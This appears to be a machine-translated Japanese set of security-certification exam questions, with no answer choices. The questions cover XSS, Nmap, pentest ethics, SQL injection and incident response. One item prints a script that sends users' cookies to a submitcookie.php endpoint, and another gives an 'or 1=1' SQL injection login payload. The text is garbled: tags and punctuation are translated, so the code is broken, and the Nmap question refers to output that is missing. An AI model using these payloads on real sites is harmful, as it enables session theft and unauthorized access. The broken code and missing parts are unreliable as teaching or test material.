ジュディはフォーラムを作成しました。ある日、彼女はユーザーがコメントを書かずに奇妙な画像を投稿していることに気づきました。
彼女はすぐにセキュリティの専門家に電話し、次のコードがこれらの画像の背後に隠されていることを発見しました。
<スクリプト>
document.write（'<img.src = "https：//localhost/submitcookie.php？cookie ='+ escape（document.cookie）+"'/>）;
</ script>
画像をクリックしたユーザーにはどのような問題が発生しましたか？

次のNmap出力について考えてみます。

Webサーバーのタイプとバージョン番号を判別するためにどのコマンドラインパラメーターを使用できますか？

あなたの会社は、地元の中小企業の侵入テストとセキュリティ評価を実施しています。定期的なセキュリティ評価中に、クライアントが人身売買に関与していることを示唆する情報を発見します。
あなたは何をするべきか？

SQLインジェクションの脆弱性についてアプリケーションをテストするとします。あなたはバックエンドデータベースがMicrosoftSQLServerに基づいていることを知っています。ログイン/パスワードフォームに、次の資格情報を入力します。
ユーザー名：attack'または1=1-
パスワード：123456
上記のクレデンシャルに基づいて、SQLインジェクションの脆弱性が実際に存在する場合、サーバーによって実行されると予想されるSQLコマンドは次のうちどれですか。

Nedvedは、彼の国の銀行のITセキュリティマネージャーです。いつか。彼は、電子メールサーバーから不明なIPアドレスへの疑わしい接続の分析に基づいて、会社の電子メールサーバーにセキュリティ違反があることを発見しました。
インシデント対応チームに連絡する前に、ネドベドが最初に行う必要があることは何ですか？